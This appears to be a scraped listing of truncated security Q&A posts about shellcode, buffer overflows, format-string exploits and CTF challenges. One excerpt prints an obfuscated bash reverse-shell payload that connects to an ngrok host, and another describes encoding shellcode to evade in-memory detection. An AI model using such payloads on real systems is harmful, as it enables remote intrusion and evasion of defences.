Collaborate Disseminate
I’m trying to exploit the code posted by ir0nstone at this link. I followed any of the steps listed in the tutorial, but Address space layout randomization (ASLR) is not enabled on my machine. When I launch the exploit with python3 exploit… Continue reading Buffer Overflow shell
$(/bin/prin[t]f ‘ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27’)
-i: -c: line 1: unexpected EOF while looking for matching `”
I was trying to get a reverse shell in this manner for a CTF cha… Continue reading Reverse Shell payload does not work
I usually use a different method to push /bin/sh in rdi to get a shell, but I wanted to try this one :
Put in case that I can control the RIP and there are no limitations or filters. So I can execute the assembly code as I want.
mov rax, … Continue reading push /bin/sh to get a shell
When I compile my shellcode and run it, Strace does not show an error.
When I use my shellcode tester, I get a segmentation fault. I don’t know why, maybe there’s a smarter guy than me who can help me solve the problem I’ve been having for… Continue reading why does my shellcode segfault assembly x86-64bit? [migrated]
The following code should be exploited and I need to exploit it in such a way that it runs my command (l33t) and there should be shellcode and exploit included, so that it runs my command. I believe I need to use GDB and it has something t… Continue reading How can I exploit the following code using string format vulnerabilities, Global offset table & GDB? [closed]
I’m learning how to exploit a tiny web server based on a well written post here: https://blog.coffinsec.com/2017/11/10/tiny-web-server-buffer-overflow-discovery-and-poc.html
I am very close to successfully exploiting it, but I am stuck on … Continue reading How to properly pack address into bytes to overwrite EIP register
I have an existing Outbound Rule in my firewall with a set of specified IP addresses. For enhanced security, I want to append additional IP addresses to this rule using a shell script. I am trying to execute the following command:
netsh ad… Continue reading One or more essential parameters were not entered powershell for firewall outbound rule command [migrated]
Working on a CTF challenge and the coordinators hint suggests that one of the vectors to inject shellcode is via pathing. Looking at debugging prints does show the cwd and filename are passed onto the stack and a quick test shows creating … Continue reading Encoding shellcode to hide in filename / directory
How to make the shellcode work. The stack is not correctly allocated, it gives a write-by-address error. I use msvc compiler. /Od /DYNAMICBASE:NO /MT /GS-.
Code:
#pragma code_seg(".text")
inline void stub()
{
… Continue reading Problem with array allocation in shellcode [closed]
I am developing a custom shellcode encoder in C++. It takes shellcode as a command line argument and generates encoded shellcode (unsigned char array) and the instructions to decode it (C/C++ code). I then use the output of my encoder into… Continue reading Decoding shellcode gets detected in memory on runtime